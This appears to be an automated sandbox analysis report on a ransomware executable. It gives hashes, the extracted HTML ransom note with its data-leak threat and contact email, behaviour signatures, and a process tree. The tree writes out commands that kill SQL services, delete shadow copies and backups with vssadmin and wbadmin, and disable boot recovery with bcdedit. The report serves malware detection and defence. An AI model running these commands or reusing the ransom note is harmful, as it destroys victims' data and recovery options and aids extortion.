Analysis

  • max time kernel
    162s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-01-2024 15:12

General

  • Target

    3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe

  • Size

    332KB

  • MD5

    7286267a7eeaf2c3122635c5edb71e84

  • SHA1

    d342d986442a20453d3c9a438766758301d88d4e

  • SHA256

    3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f

  • SHA512

    8567661bc656edbacd0ca59f1d1b38cad7c3101d8d06772ae1eba9828792327cbc6b4254e5e61d2b190f4f4350c6288ac2e5c811f7a4ed0c38bc4be8ccf636f0

  • SSDEEP

    6144:0LI9sGqBET+/evZ9zgDU/JSrJyhSdDXR0sVWorEriYtkD:d9JL+/eh90DU/JYUh01YtkD

Score
10/10

Malware Config

Extracted

Path

C:\odt\How_to_back_files.html

Ransom Note
<html> <style type="text/css"> body { background-color: #f5f5f5; } h1, h3{ text-align: center; text-transform: uppercase; font-weight: normal; } /*---*/ .tabs1{ display: block; margin: auto; } .tabs1 .head{ text-align: center; float: top; padding: 0px; text-transform: uppercase; font-weight: normal; display: block; background: #81bef7; color: #DF0101; font-size: 30px; } .tabs1 .identi { font-size: 10px; text-align: center; float: top; padding: 15px; display: block; background: #81bef7; color: #DFDFDF; word-break: break-all; } .tabs .content { background: #f5f5f5; /*text-align: center;*/ color: #000000; padding: 25px 15px; font-size: 15px; font-weight: 400; line-height: 20px; } .tabs .content a { color: #df0130; font-size: 23px; font-style: italic; text-decoration: none; line-height: 35px; } .tabs .content .text{ padding: 25px; line-height: 1.2; } </style> <body> <div class="tabs1"> <div class="head" ><b>Your personal ID:</b></div> <div class="identi"> <span style="width:1000px; color: #ffffff; font-size: 10px;">12iec8udKAwgNDlfFlYWEh+E+2+3WkGCaBQIXbI3nXeVgc79eWg5to+G1mJCEkTNKkqRiaf3PAFkZbqRtTOUyUP0mo1xO6RSmnPtCZAEMDq/ibKF6RUrvTdRbS8wNFsr33whVLvoDm7z3uol/qDkqGGNqKMsPGo4nUlBZDbWnjLLcWt5k1Fv1owvqu80+jgN2Ni+8lUU2VQs01sCFzo6uh8L2jJc7iuxEKHI6KCKNmLjAY/xB8FyH6+8XpIQVW1vXYAikbJd0rj+U/iNOl5o3w8mrKRjy4hjMCXXT92+OD1bSvAVuAunYYNS/ikCV8r/+BOV5ZeU94VCCtg/+ydlibpI0v+D6436YR8QDQ0frejJC2JkYUGaUCZGG06DFQLzfpyoXnvsqVN8IUT8aYusv91R3Eed8sjZlsF2blnjSoCc7nRHMSpBzECp4G7+9jo25YfQliv3ko7VDrnIiPQHR1iq2fPl+xG9fBPl/F2c6A6g6+6vFUguahe+dydy8pLAvR22g+HOku57wTwnuL5K7jwGoXZ0O6pQADV/XMU4tTF4yeeQapBj33Fu+ZpzE9Q6wNaWmKRQMVO6qNXS/herMQZ5wtaUDz9uNMGNJASx4nY8JfcR7JMfz+e9z/hAoLmraKJxXxfRWfcOX0mIcECmVJqLe+raa7OBrnBL2S/4SQixrzlro7gPnFsYBJVj//ieyhvlZ8JnBs9ORDMP4vCm8rrLhG0iit8PPdmOoOZXYE4+eXDSquieeI43pNIts4yMbD4O1VHwDXpbw2YjGyFiWW43mBnYJn83VKP/QHhoIh4pGtuY2D0HzLMNYxJm20yMv5goLB8Uh0GgrakNHg+oQlfvkK0U2dgZHRjZWgf9c70FYlbSRTGGaHpavdD6Irkst/yLteNPvSurd4iN7AqxEbFq6HLIe5SBAnUiys4tWkNhOXu0udo6wvqYNiF7p2EavVDAF4774178VSY+DOl26GR/O5psN6QWqKutWyY9M8rDDfW6ttu72MJ21YbWenJ8g1TfG3nWNqtwdUWi5nMgohAXeY0uwV2TMZN4FiWpT8I1MpYhseA0AnJAVRI9wfYeUDekcFP5/tr2Q46/qTOSx+4E18mD0tffuxFypLFxWpio8NT0g52Hov5/W1XVWy45Fp+Kcp9fYH9uVtRMK0mRa25pQlnfq6W+iGbJvXTvKVRv1wXqVAE3kM6q1fdWC4Sqlx82YCG44AFF1g+lJHtKHQILE2acljG4+OGm6avagqOt7g8dxw0O3+oZEP7y4zpeEJ0F+EbDNbR4ZydRDvQ0SPhZKFqu7/K/MjyxHlI6ipZyca/wVMFHskQ1nRrvdduhKm2c3RiEktbT2JLHBzt9yCO6YWzsCHIpuRCod2YKX5USEfoGx2YCcYOns+1EHXw/5wghu47/9mgQeCBBu34KTmguKmZU5FfbNaRfUZ4CzAfVdF0QZ0EzQlFLss9zXpQntlz+si8xq+dPV7liwY9HYCn7IeqYZHyy2YhlWsPNY2oV95zI+D9M3+BA7zQPoTEig0iIAlxHb3id9awclf6jxLNCZTyLMMBlgDQijeT+9eKYMVe/H0QBdBFSqmV4tpwWoqLHlZhA4ypXwLWb+30eSNVXgKqC9Fvqx7n/gXgTeucQzHkgVThgdPqPHvtN4CQuC3t8Xh9FrjYK3W/DVzKXIu3yn1V3yGOsrpVyTe57VCw=</span> <br> <!-- !!! dont changing this !!! --> </div> </div> <!-- --> <div class="tabs"> <!--tab--> <div class="tab"> <div id="tab-content1" class="content"> <div class="text"> <!--text data --> <b>/!\ YOUR COMPANY NETWORK HAS BEEN PENETRATED /!\</b><br> <b>All your important files have been encrypted!</b><br><br> <hr> Your files are safe! Only modified. (RSA+AES)<br><br> ANY ATTEMPT TO RESTORE YOUR FILES WITH THIRD-PARTY SOFTWARE<br> WILL PERMANENTLY CORRUPT IT.<br> DO NOT MODIFY ENCRYPTED FILES.<br> DO NOT RENAME ENCRYPTED FILES.<br><br> No software available on internet can help you. We are the only ones able to<br> solve your problem.<br><br> We gathered highly confidential/personal data. These data are currently stored on<br> a private server. This server will be immediately destroyed after your payment.<br> If you decide to not pay, we will release your data to public or re-seller.<br> So you can expect your data to be publicly available in the near future..<br><br> We only seek money and our goal is not to damage your reputation or prevent<br> your business from running.<br><br> You will can send us 2-3 non-important files and we will decrypt it for free<br> to prove we are able to give your files back.<br><br> <!--text data --> <hr> <b>Contact us for price and get decryption software.</b><br><br> <hr> <b>email:</b><br> <a href="ithelp011@decorous.cyou ">ithelp011@decorous.cyou </a> <br> <a href="ithelp011@decorous.cyou ">ithelp011@decorous.cyou </a> <br> <p>* To contact us, create a new free email account on the site: <a href="https://protonmail.com">protonmail.com <br> <b> IF YOU DON'T CONTACT US WITHIN 72 HOURS, PRICE WILL BE HIGHER.</b><br> </div> </div> </div> <!--tab--> <!--text data --> </div> </div> <!--tab--> </div> </div> </body> </html>
Emails

href="ithelp011@decorous.cyou

">ithelp011@decorous.cyou

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (446) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe
    "C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:4088
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4888
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
        3⤵
          PID:2268
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlbrowser.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4896
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3636
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:556
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sql writer.exe
            4⤵
            • Kills process with taskkill
            PID:1860
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1648
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3336
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlserv.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:932
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3876
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im msmdsrv.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1636
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5040
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4804
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im MsDtsSrvr.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1724
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1972
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2032
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlceip.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4456
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im fdlauncher.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3076
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1976
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1200
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im Ssms.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4352
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        2⤵
          PID:2996
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
              PID:2776
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im SQLAGENT.EXE
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4728
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
            2⤵
              PID:3352
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                3⤵
                  PID:4332
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdhost.exe
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5100
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                2⤵
                  PID:5104
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                    3⤵
                      PID:2992
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im ReportingServicesService.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4512
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                    2⤵
                      PID:3696
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                          PID:3756
                          • C:\Windows\system32\taskkill.exe
                            taskkill -f -im msftesql.exe
                            4⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:5020
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                        2⤵
                          PID:4364
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            3⤵
                              PID:4244
                              • C:\Windows\system32\taskkill.exe
                                taskkill -f -im pg_ctl.exe
                                4⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1160
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                            2⤵
                              PID:4896
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                3⤵
                                  PID:3640
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill -f -impostgres.exe
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1556
                              • C:\Windows\SysWOW64\cmd.exe
                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                2⤵
                                  PID:4672
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                    3⤵
                                      PID:3468
                                      • C:\Windows\system32\net.exe
                                        net stop MSSQLServerADHelper100
                                        4⤵
                                          PID:1936
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                            5⤵
                                              PID:1276
                                      • C:\Windows\SysWOW64\cmd.exe
                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                        2⤵
                                          PID:2480
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                            3⤵
                                              PID:3868
                                              • C:\Windows\system32\net.exe
                                                net stop MSSQL$ISARS
                                                4⤵
                                                  PID:1636
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop MSSQL$ISARS
                                                    5⤵
                                                      PID:3708
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                2⤵
                                                  PID:3192
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                    3⤵
                                                      PID:2728
                                                      • C:\Windows\system32\net.exe
                                                        net stop MSSQL$MSFW
                                                        4⤵
                                                          PID:5040
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop MSSQL$MSFW
                                                            5⤵
                                                              PID:2536
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                        2⤵
                                                          PID:2720
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                            3⤵
                                                              PID:1824
                                                              • C:\Windows\system32\net.exe
                                                                net stop SQLAgent$ISARS
                                                                4⤵
                                                                  PID:1972
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                                    5⤵
                                                                      PID:3916
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                2⤵
                                                                  PID:3804
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                    3⤵
                                                                      PID:4724
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop SQLAgent$MSFW
                                                                        4⤵
                                                                          PID:728
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                                      2⤵
                                                                        PID:4168
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                                          3⤵
                                                                            PID:1960
                                                                            • C:\Windows\system32\net.exe
                                                                              net stop SQLBrowser
                                                                              4⤵
                                                                                PID:1704
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop SQLBrowser
                                                                                  5⤵
                                                                                    PID:4608
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                              2⤵
                                                                                PID:3940
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                  3⤵
                                                                                    PID:528
                                                                                    • C:\Windows\system32\net.exe
                                                                                      net stop REportServer$ISARS
                                                                                      4⤵
                                                                                        PID:3104
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop REportServer$ISARS
                                                                                          5⤵
                                                                                            PID:4316
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                                      2⤵
                                                                                        PID:2964
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                                          3⤵
                                                                                            PID:1148
                                                                                            • C:\Windows\system32\net.exe
                                                                                              net stop SQLWriter
                                                                                              4⤵
                                                                                                PID:3080
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 stop SQLWriter
                                                                                                  5⤵
                                                                                                    PID:4084
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                              2⤵
                                                                                                PID:5104
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                  3⤵
                                                                                                    PID:2268
                                                                                                    • C:\Windows\system32\vssadmin.exe
                                                                                                      vssadmin.exe Delete Shadows /All /Quiet
                                                                                                      4⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:4204
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                  2⤵
                                                                                                    PID:4288
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                      3⤵
                                                                                                        PID:4284
                                                                                                        • C:\Windows\system32\bcdedit.exe
                                                                                                          bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                          4⤵
                                                                                                          • Modifies boot configuration data using bcdedit
                                                                                                          PID:3924
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                      2⤵
                                                                                                        PID:3116
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                          3⤵
                                                                                                            PID:4668
                                                                                                            • C:\Windows\system32\bcdedit.exe
                                                                                                              bcdedit.exe /set {default} recoverynabled No
                                                                                                              4⤵
                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                              PID:5044
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                          2⤵
                                                                                                            PID:2168
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                              3⤵
                                                                                                                PID:1436
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  wmic.exe SHADOWCOPY /nointeractive
                                                                                                                  4⤵
                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                  PID:4028
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                              2⤵
                                                                                                                PID:3060
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                  3⤵
                                                                                                                    PID:3640
                                                                                                                    • C:\Windows\system32\wbadmin.exe
                                                                                                                      wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                      4⤵
                                                                                                                        PID:5040
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                    2⤵
                                                                                                                      PID:888
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                        3⤵
                                                                                                                          PID:2236
                                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                                            wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                            4⤵
                                                                                                                            • Deletes System State backups
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:2728
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                        2⤵
                                                                                                                          PID:496
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                            3⤵
                                                                                                                              PID:4912
                                                                                                                              • C:\Windows\system32\wbadmin.exe
                                                                                                                                wbadmin delete backup -keepVersion:0 -quiet
                                                                                                                                4⤵
                                                                                                                                • Deletes system backups
                                                                                                                                PID:4704
                                                                                                                        • C:\Windows\Explorer.EXE
                                                                                                                          C:\Windows\Explorer.EXE
                                                                                                                          1⤵
                                                                                                                            PID:3372
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe
                                                                                                                              \\?\C:\Users\Admin\AppData\Local\Temp\3538750cfe06d8fe364bc4f396229bfd08c9856f17477b0f8444d35a7f89775f.exe -network
                                                                                                                              2⤵
                                                                                                                              • System policy modification
                                                                                                                              PID:1936
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c pause
                                                                                                                                3⤵
                                                                                                                                  PID:2032
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                                                                              1⤵
                                                                                                                                PID:4400
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:3176

                                                                                                                              Network

                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                21.53.126.40.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                21.53.126.40.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                206.178.17.96.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                206.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                206.178.17.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                a96-17-178-206deploystaticakamaitechnologiescom
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                95.221.229.192.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                241.154.82.20.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                41.110.16.96.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                41.110.16.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                Response
                                                                                                                                41.110.16.96.in-addr.arpa
                                                                                                                                IN PTR
                                                                                                                                a96-16-110-41deploystaticakamaitechnologiescom
                                                                                                                              • flag-us
                                                                                                                                DNS
                                                                                                                                157.123.68.40.in-addr.arpa
                                                                                                                                Remote address:
                                                                                                                                8.8.8.8:53
                                                                                                                                Request
                                                                                                                                157.123.68.40.in-addr.arpa
                                                                                                                                IN PTR
